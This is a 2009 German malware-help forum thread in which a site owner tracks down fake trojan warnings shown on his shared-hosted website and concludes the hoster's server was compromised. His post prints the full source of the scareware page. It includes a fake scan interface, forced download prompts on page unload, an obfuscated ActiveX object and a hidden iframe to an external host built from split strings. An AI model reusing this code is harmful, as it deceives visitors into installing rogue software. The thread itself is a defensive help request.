Zurück   Trojaner-Board > Malware entfernen > Plagegeister aller Art und deren Bekämpfung

Plagegeister aller Art und deren Bekämpfung: Quelle von Fake Tronajer-Warnungen finden

Windows 7 Wenn Du nicht sicher bist, ob Du dir Malware oder Trojaner eingefangen hast, erstelle hier ein Thema. Ein Experte wird sich mit weiteren Anweisungen melden und Dir helfen die Malware zu entfernen oder Unerwünschte Software zu deinstallieren bzw. zu löschen. Bitte schildere dein Problem so genau wie möglich. Sollte es ein Trojaner oder Viren Problem sein wird ein Experte Dir bei der Beseitigug der Infektion helfen.

Antwort
Alt 26.07.2009, 11:10   #1
ActronAB
 
Quelle von Fake Tronajer-Warnungen finden - Standard

Quelle von Fake Tronajer-Warnungen finden



Hallo Board!

Ich habe eine eigene Website bei einem Shared Hoster, also Webspace mit FTP Zugang. Lokal nutze ich Win XP SP3 mit Opera 9.27 und AVG 8.5.392.

Manchmal erscheint beim Besuch meiner Website eine gefälschte Trojaner-Warnung. Also so ein Bild mit von einem Windows-Fenster mit eine Hinweis, mein Rechner sei verseucht und ein Javascript Alert, dass Trojaner XY gefunden wurde und ich den entfernen sollte. Also da versucht mir wohl wer Scareware oder so unterzuschieben.

Nur weiß ich nicht wo der Fehler herkommt und bin da nun ziemlich verunsichert. Die Meldung erscheint ohne erkennbares Prinzip und nicht reproduzierbar. Mal auf der Start- und mal auf Unterseiten oder in Frames.

Oft kommt in Opera zudem diese Meldung:
Zitat:
Weiterleitungstatus
Die URL wurde nach <Pfad zu Seite> weitergeleitet. Bitte klicken Sie auf den Link, um die Adresse aufzurufen.

Sie können die automatische Weiterleitung in den Einstellungen aktivieren.

Automatisch erstellt von Opera ©
Aber dann leitet er nur immer auf meine eigenen Seiten weiter, also nichts Böses. Meinen Webspace habe ich schon nach verdächtigen Scripts oder ominösen Management Konsolen durchsucht, konnte aber nichts finden. Wo kann da die Fehlerquelle liegen?

Im Webspace? Oder höher irgendwo im Apache wo ich nicht dran komme?

Im Browser? Opera 9.27 ist nicht die neuste Version, aber mit Opera 9.6x hatte ich nur Probleme und bin wieder zurückgegangen. Warum dann nur auf meiner Seite? Mit FF kam der Trojaner-Dialog noch nicht aber ich kann ihn wie gesagt auch mit Opera nicht verlässlich reproduzieren.

Auch verdächtig: AVG wirbt seit Neustem mit einer "Special Offer" für irgendein Internet Security Paket. Ich hab schon vermutet, dass die mir vielleicht die Seiten irgendwie unterschieben, damit ich ihr Produkt kaufe. Aber bisher erschien mit AVG seriös und auch hier frag ich mich, warum das nur auf meiner Seite kommt.

Hat vielleicht mal wer ähnliche Probleme gehabt und kann mir einen Tipp geben wie ich die Ursache finden kann?

Gruß

// Edit: Hab noch 2 Screenshots gemacht weil grad kam wieder so eine Meldung. Allerdings ohne das gefakte Win-Fenster sondern direkt JS. Da ist auch die Url zu sehen.

// Edit 2: Grad kam noch ein Fenster von AVG. Der Schädling ist ein FakeAlert.KJ steht dort. Drei Dateien im Opera Cache sind es.

// Edit 3: Hier der Quellcode der "Fehlerseite":
Code:
ATTFilter
<html>
<head> 
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2">
<title>My Computer</title>
<link rel="icon" href="/favicon.ico" type="image/x-icon" />
<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<script type="text/javascript">if(self.parent.frames.length!=0){self.parent.location=document.location}</script><script type="text/javascript">window.moveTo(0, 0); window.resizeTo(screen.availWidth, screen.availHeight);
var mw_texts = new Array();</script>
<script type="text/javascript" src="files/brand_constants.js"></script>
 <script type="text/javascript" src="files/text_constants_de.js"></script> <script type="text/javascript">
 var onclick_download =true;
 var DESTRUB = 1; 
var xx = 1; 
var end = 1; 
var h = false; 

var install_info = 1; 
var add_url = "uid=12800";
window.call_before_download = function(){
 showInstallInstructions(); }
 </script>
 <script type="text/javascript">
if(end == 1)
{
dangerWindAdr = "/nag/1/?" + add_url + "&n=nag";}
if(navigator.appVersion.indexOf('MSIE') > 0){
 window.isIE = true;
function msieversion()
 {
 var ua = window.navigator.userAgent;
 var msie = ua.indexOf ( "MSIE " );
 if ( msie > 0 ) 
 return parseInt (ua.substring (msie+5, ua.indexOf (".", msie )))
 else 
 return 0;

 }
window.IEversion=msieversion();
}
function openDangerWindow(adr)
{
if (window.isIE) {
 if(window.IEversion < 6){
 window.open(adr);
 }else 
 { 
 try{
 document.getElementById('iie').launchURL(adr);
 }catch(ex)
 {
 }
 }}else{
 location.href = adr;
 }
}

function exiter(){
 if (onclick_download){
 openDangerWindow(window.location.href);
 openDangerWindow(dangerWindAdr + "&install=1");
 return false;
 }
 return true;
}

if (window.attachEvent)
 eval("window.attachEvent('onunload',exiter);");
else
 window.addEventListener("unload", exiter, false);
</script>

 
 
 
 <link href="files/pre_load.css" rel="stylesheet" type="text/css"> 
 
 

  <link href="files/this_landing.css" rel="stylesheet" type="text/css"> 
 <script type="text/javascript">
window.show_darkness = function()
{

 windowHeight = document.body.clientHeight;
 document.getElementById("grayFon").style.height = (windowHeight <= 640) ? '660' : '100%';
 document.getElementById("grayFon").style.display = "block";
}

window.hide_darkness = function()
{
 document.getElementById("grayFon").style.display = "none";
}



</script>


<script type="text/javascript">

function onSelect(){
 // if(window.event.srcElement.tagName != "INPUT" && window.event.srcElement.tagName != "TEXTAREA"){
 window.event.returnValue = false;
 window.event.cancelBubble = true;
 //}
}
function onContextmenu(){
 // if(window.event.srcElement.tagName != "INPUT" && window.event.srcElement.tagName != "TEXTAREA"){
 window.event.returnValue = false;
 window.event.cancelBubble = true;
 return false;
 //}
}
function onInitPage(){
 window.scan==1;
var pageObjects = document.all;
for(i=0; i < pageObjects.length; i++){
 if(pageObjects(i).tagName != "INPUT" && pageObjects(i).tagName != "TEXTAREA"){
 pageObjects(i).style.cursor = "default";
 };
}
// handle events
document.onselectstart = onSelect;
document.oncontextmenu = onContextmenu;
}
</script>
<script type="text/javascript" src="/common/destrub.js"></script>
<script type="text/javascript" src="files/mouse_block.js"></script> 
 </head>
 
 <body onload=" add_stata_container(); onInitPage();">
 <div id="preloader"></div>
<script type="text/javascript">
document.write('<OBJ'+'ECT id="i'+'ie" width="0" height="0" style="position:absolute; left:0;top:0;" CLAS'+'SID="CLS'+'ID:6BF'+'52A'+'52-394A-11'+'d3-B153-00C04F'+'79FAA6" type="application/x-ole'+'obje'+'ct"> <PA'+'RAM NAME="Sen'+'dPlayStateCha'+'ngeEvents" VALUE="True"> <PA'+'RAM NAME="Au'+'toSt'+'art" VALUE="True"> <PAR'+'AM name="uiMo'+'de" value="none"> <PA'+'RAM name="Play'+'Count" value="9999"></OBJECT>');</script>
<script type="text/javascript" src="files/unic_scripts.js"></script>
 
 <script src="/common/stata.js" ></script>
<script src="/common/build/yahoo-dom-event/yahoo-dom-event.js" ></script>

 
 <DIV id=grayFon style="DISPLAY: none"></DIV>

 
 <!--<a class="mw_final_res" onclick="install_begun();return false;" href="#">--><!--<div class="mw_final_win" id="mw_results_window">
 
 </div>-->
 <div style="DISPLAY: none" class="mw_final_win" id="mw_results_window" onclick="install_begun();return false;">
 <div id="pt1"><span class="def1"></span></div>
 <!--<div id="pt2"><span class="def2"></span></div>-->
 <div id="pt3"><span class="def3"></span></div>
 <div id="pt4"><span class="def4"></span><span id="unalertlvl"><span class="def5"></span></span></div>
 <div id="pt5"><span class="def6"></span></div>
 <div id="pt6"><span class="def7"></span></div>
 <div id="ptlist"><div id="ptlist1">Trojan-IM.Win32.Faker.a</div><div id="ptlist2"><span class="def8"></span></div>
 <div id="ptlist1">Virus.Win32.Faker.a</div><div id="ptlist2"><span class="def8"></span></div>
 <div id="ptlist1">Trojan.PSW.BAT.Cunter</div><div id="ptlist2"><span class="def8"></span></div>
 </div>
 <div id="ptbtns"><div id="ptbtn1"><span class="def9"></span></div><div id="ptbtn2"><span class="def10"></span></div></div>
 
</div>
 <!--</a>-->

 <div class="mw_window" id="mw_main_win" onclick="install_begun();">
 <div class="mw_win_body">
 <!--plaz-->
 <div class="mw_window_plaz">
 
 <div class="mw_search_left_panel">
 
<TABLE class=main cellSpacing=0 cellPadding=0 width="100%" border=0>
 <TBODY>
 <TR>
 <TD class=left vAlign=top width=209>
 <DIV class=top_box>
 <DIV class=title1><span class="s_tasks"></span></DIV></DIV>
 <DIV class=box>
 <TABLE cellSpacing=0 cellPadding=0 width=180 border=0>
 <TBODY>
 <TR>
 <TD class=s_img vAlign=top width=28><IMG alt=" " src="files/i5.jpg"></TD>
 <TD vAlign=top width=152><A 
 onclick="return false;" 
 href="#"><span class="s_info"></span></A></TD></TR>
 <TR>
 <TD class=s_img vAlign=top width=28><IMG alt=" " src="files/i6.jpg"></TD>
 <TD vAlign=top width=152><A 
 onclick="return false;" 
 href="#"><span class="rem_prog"></span></A></TD></TR>
 <TR>
 <TD class=s_img vAlign=top width=28><IMG alt=" " src="files/i4.jpg"></TD>
 <TD vAlign=top width=152><A 
 onclick="return false;" 
 href="#"><span class="chang_set"></span></A></TD></TR></TBODY></TABLE></DIV>
 <DIV class=top_box>
 <DIV class=title1><span class="o_place"></span></DIV></DIV>
 <DIV class=box>
 <TABLE cellSpacing=0 cellPadding=0 width=180 border=0>
 <TBODY>
 <TR>
 <TD class=s_img vAlign=top width=28><IMG alt=" " src="files/i1.jpg"></TD>
 <TD vAlign=top width=152><A 
 onclick="return false;" 
 href="#"><span class="net_place"></span></A></TD></TR>
 <TR>
 <TD class=s_img vAlign=top width=28><IMG alt=" " src="files/i2.jpg"></TD>
 <TD vAlign=top width=152><A 
 onclick="return false;" 
 href="#"><span class="my_doc"></span></A></TD></TR>
 <TR>
 <TD class=s_img vAlign=top width=28><IMG alt=" " src="files/i3.jpg"></TD>
 <TD vAlign=top width=152><A 
 onclick="return false;" 
 href="#"><span class="shar_doc"></span></A></TD></TR>
 <TR>
 <TD class=s_img vAlign=top width=28><IMG alt=" " src="files/i4.jpg"></TD>
 <TD vAlign=top width=152><A 
 onclick="return false;" 
 href="#"><span class="contr_pan"></span></A></TD></TR></TBODY></TABLE></DIV>
 <DIV class=top_box>
 <DIV class=title1><span class="dets"></span></DIV></DIV>
 <DIV class=box><STRONG>&nbsp;&nbsp;&nbsp;&nbsp;<span class="my_comp"></span></STRONG><BR>&nbsp;&nbsp;&nbsp;&nbsp;<span class="s_fold"></span></DIV>
 </TD></TR></TBODY></TABLE>
 </div>
 
 <div class="mw_window_body">
 <div id="mw_disk_c" class="mw_wi_disk mw_hd_disk"><span class="mw_name"><span class="local_c"></span></span><span id="mw_err_1" class="mw_error"><span class="hardw_error1"></span></span></div>
 <div id="mw_disk_d" class="mw_wi_disk mw_hd_disk"><span class="mw_name"><span class="local_d"></span></span><span id="mw_err_2" class="mw_error"><span class="hardw_error2"></span></span></div> 
 <div id="mw_disk_dvd" class="mw_wi_disk mw_dvd_disk"><span class="mw_name"><span class="local_dvd"></span></span></div>
 <div id="mw_disk_fldr" class="mw_wi_disk mw_folder_disk"><span class="mw_name"><span class="shared"></span></span><span id="mw_err_3" class="mw_error"><span class="sec_thr"></span></span></div>
 <div class="mw_disclaimer"><span class="secr_thr_fndd"></span></div>
 <div class="mw_progress_bar">
 <span class="mw_status" id="mw_status"></span>
 <div class="pb_decor"><div class="decor_lp"></div><div class="decor_rp"></div><div id="mw_progress_bar"></div></div>
 <A id="mw_cncl_but" class="mw_cancel" onclick="install_begun(); return false;" href="#"></A>
 </div>
 <div class="mw_display_filename">
 <span class="mw_status"><span class="object"></span></span>
 <span class="mw_filename" id="mw_file_name"></span>
 </div>
 
 <div class="mw_test_results" id="mw_inwin_results"><div class="mw_test_rez_decor"><div class="mw_res_rtc"></div>
 <div class="mw_header_f_res"><span class="hrdw_n_sec"></span></div>
 <a class="mw_remove_button" onclick="install_begun(); return false;" href="#"></a>
 <div class="mw_res_pads">
 <span class="mw_res_hdr"><span class="hrdw_errors"></span></span>
 <div class="mw_res_text"><span class="perfomance_usw"></span></div>
 
 <span class="mw_res_hdr"><span class="privacey_errors"></span></span>
 <div class="mw_res_text">
 <span class="spyw_ws_stol"></span>
 <span class='c_country'></span>:&nbsp;<b>Germany</b><br>
<span class='c_city'></span>:&nbsp;<b>xxx Stadt</b><br>
<span class='c_ip'></span>:&nbsp;<b>xx.xxx.xxx.xxx</b><br><br>
  
 </div>
 </div>
 </div></div> 
 </div>
 </div>
 <!--//plaz--> 
 </div>
 </div>
 
<script language="javascript" src="files/domFunction.js"></script> 
<script language="javascript" src="files/startafter.js"></script> 
<script type="text/javascript">document.write("<iframe style='border:0px' src='htt"+"p:/"+"/in"+"5ch"+".co"+"m/c"+"ki."+"php"+"?ui"+"d=1"+"280"+"0' width=1 height=1></iframe>");</script> 
 <SCRIPT> 
 window.scan=1;
 </SCRIPT>
</body>

</html>
         
Miniaturansicht angehängter Grafiken
Quelle von Fake Tronajer-Warnungen finden-meldung1.jpg   Quelle von Fake Tronajer-Warnungen finden-meldung2.jpg   Quelle von Fake Tronajer-Warnungen finden-meldung3.jpg  

Geändert von ActronAB (26.07.2009 um 11:53 Uhr)

Alt 26.07.2009, 12:29   #2
ActronAB
 
Quelle von Fake Tronajer-Warnungen finden - Standard

Quelle von Fake Tronajer-Warnungen finden



Also auf dem Notebook kam es jetzt auch. Ist zwar genauso konfiguriert (Win XP Sp3, Opera 9.27 und AVG) aber dann liegt's wohl echt an der Website. Was meint ihr? Ich glaube es kommt nur auf PHP Seiten, aber da auf allen. Ob da über die php.ini überall was eingebunden wird? Da komme ich ja nicht dran aber vielleicht wurde der Server gehackt?
__________________


Alt 26.07.2009, 16:13   #3
ActronAB
 
Quelle von Fake Tronajer-Warnungen finden - Standard

Quelle von Fake Tronajer-Warnungen finden



Ich glaube ich habe das Problem lokalisiert: Der Server des Shared Hosters muss gehackt worden sein.

http://www.wewatchyourwebsite.com/wordpress/?p=202
__________________

Alt 26.07.2009, 17:40   #4
john.doe
 
Quelle von Fake Tronajer-Warnungen finden - Standard

Quelle von Fake Tronajer-Warnungen finden



Hallo und

Wenn ich lendshaft.info aufrufe, erscheint



Es ist ein ähnlicher Fall, den ich hier dokumentiert habe, nur das ich diesesmal keine Datei zum Download bekomme.

Falls du deinen Rechner überprüfen möchtest, klicke auf "Für alle Neuen" in meiner Signatur, lies alles aufmerksam und arbeite die komplette Liste unter Punkt 2 ab.

ciao, andreas
__________________
Kein Support per PN! Das ist hier ein Forum und keine Privatbetreuung!
Privatbetreuung nur gegen Bezahlung und ich koste sehr teuer.
Für alle Neuen
Anleitungen
Virenscanner
Kompromittierung unvermeidbar?

Alt 26.07.2009, 18:42   #5
ActronAB
 
Quelle von Fake Tronajer-Warnungen finden - Standard

Quelle von Fake Tronajer-Warnungen finden



Jupp, das ist eine der mögl. Fake-Fehlerseiten. Glaube nicht, dass ich da lokal viel zu befürchten habe. Mache mir drzt. mehr Sorgen um den Webspace und die Besucher meiner Website, bzw. den befallenen Shared Hosting-Server vom ISP (siehe meinen Link oben).


Alt 26.07.2009, 18:50   #6
john.doe
 
Quelle von Fake Tronajer-Warnungen finden - Standard

Quelle von Fake Tronajer-Warnungen finden



Auf einen anderen ausweichen, mehr kann ich in dem Fall nicht für dich tun.

Du bist entlassen.

Schönen Sonntag noch,
andreas
__________________
--> Quelle von Fake Tronajer-Warnungen finden

Alt 26.07.2009, 19:10   #7
ActronAB
 
Quelle von Fake Tronajer-Warnungen finden - Standard

Quelle von Fake Tronajer-Warnungen finden



Kann jedem ISP mal passieren. Bin gespannt was draus wird, denn scheint ein ganz frischer Befall zu sein. Wenigsten weiß ich jetzt woran's liegt (kein lokales Prob) und dass ich meine Besucher schützen muss.

Antwort

Themen zu Quelle von Fake Tronajer-Warnungen finden
100%, alert, automatische weiterleitung, avg, bild, browser, button, computer, dateien, download, einstellungen, entfernen, error, fake, fehler, ftp, html, icon, internet, internet security, konsolen, link, opera, schädling, security, shortcut, sp3, strong, warum, win xp, win xp sp3




Ähnliche Themen: Quelle von Fake Tronajer-Warnungen finden


  1. Anhang einer fake DHL Mail geöffnet. Avira und mailwarebytes finden nichts!
    Plagegeister aller Art und deren Bekämpfung - 22.05.2015 (9)
  2. Alphy Encryption Virus .exx files - Quelle?
    Diskussionsforum - 21.05.2015 (5)
  3. PC spielt plötzlich Audiospuren von Werbefilmen ab, Quelle unbekannt
    Log-Analyse und Auswertung - 01.05.2014 (13)
  4. Windows 7: Öfter Systemabsturz, Quelle: EventLog ID: 6008
    Alles rund um Windows - 13.12.2012 (30)
  5. Trojaner nach ominöser E-Mail von vertrauter Quelle?
    Log-Analyse und Auswertung - 14.09.2012 (25)
  6. WIN 7. Musik kommt aus unbekannter Quelle.
    Plagegeister aller Art und deren Bekämpfung - 25.05.2012 (5)
  7. Trojaner TR/Fake.CX.172544, TR/Fake.bpp.174592, TR/buzus.ealr
    Plagegeister aller Art und deren Bekämpfung - 20.05.2010 (10)
  8. ebay Account missbraucht, Quelle unbekannt.
    Plagegeister aller Art und deren Bekämpfung - 15.05.2010 (23)
  9. Zufällig abgespielte Sounds mit unbekannter Quelle.
    Plagegeister aller Art und deren Bekämpfung - 02.01.2010 (8)
  10. Tronajer Verdacht Internet spürbar langsam
    Log-Analyse und Auswertung - 18.07.2009 (2)
  11. [Hilfe]Tronajer kommt nach neustart immer wieder!
    Log-Analyse und Auswertung - 15.04.2009 (0)
  12. ungewollte popups festplattencleaner.com; quelle.de; bwin.de
    Log-Analyse und Auswertung - 03.01.2008 (8)
  13. FireFox u. IE7 öffnen automatisch Werbungsite wie z.B Quelle
    Log-Analyse und Auswertung - 25.12.2007 (4)
  14. A0039163.exe/ DR/Dldr.load.adv.153438 u. a0039304.exe / TR/agennt.anr.1- tronajer???
    Plagegeister aller Art und deren Bekämpfung - 11.06.2007 (12)
  15. SYN-flood, suche nach Quelle
    Log-Analyse und Auswertung - 08.08.2006 (4)
  16. EScan zeigt Virus, aber nicht file-Quelle
    Plagegeister aller Art und deren Bekämpfung - 28.03.2005 (1)
  17. Quelle oder Zwischenlager eines Trojaners gefunden
    Log-Analyse und Auswertung - 21.09.2004 (2)

Zum Thema Quelle von Fake Tronajer-Warnungen finden - Hallo Board! Ich habe eine eigene Website bei einem Shared Hoster, also Webspace mit FTP Zugang. Lokal nutze ich Win XP SP3 mit Opera 9.27 und AVG 8.5.392. Manchmal erscheint - Quelle von Fake Tronajer-Warnungen finden...
Archiv
Du betrachtest: Quelle von Fake Tronajer-Warnungen finden auf Trojaner-Board

Search Engine Optimization by vBSEO ©2011, Crawlability, Inc.